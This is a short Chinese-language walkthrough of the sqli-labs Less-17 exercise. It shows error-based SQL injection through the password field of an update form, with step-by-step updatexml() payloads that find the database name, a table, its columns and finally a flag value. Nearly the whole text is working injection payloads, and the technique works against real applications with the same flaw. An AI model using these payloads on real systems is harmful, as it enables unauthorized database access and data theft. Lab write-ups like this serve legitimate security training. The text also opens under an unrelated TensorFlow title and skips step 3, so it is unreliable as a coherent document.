[原始碼解析] TensorFlow 分散式環境(4) --- WorkerCache
Less-17 POST - Update Query- Error Based - String (基於錯誤的更新查詢POST注入)
在本關中,我們要知道使用者名稱,對密碼處的值進行操作,才能進行下面的操作。
1.判斷是否存在注入
uname=admin&passwd=a'&submit=Submit
報錯回顯 => 存在注入
2.判斷引數型別
uname=admin&passwd=1 and 1=1&submit=Submit
正確回顯 => 字元型
4.檢視所在資料庫
uname=admin&passwd=1' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
5.檢視資料庫的表
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#&submit=Submit
6.檢視ZULae9ih表中的列
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='ZULae9ih' limit 1,1),0x7e),1)#&submit=Submit
7.查看錶中的flag列中的資料
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select flag from ZULae9ih limit 3,1),0x7e),1)#&submit=Submit
8.顯示不完全
uname=admin&passwd=1' and updatexml(1,concat(0x7e,right((select flag from ZULae9ih limit 3,1) ,31),0x7e),1) #&submit=Submit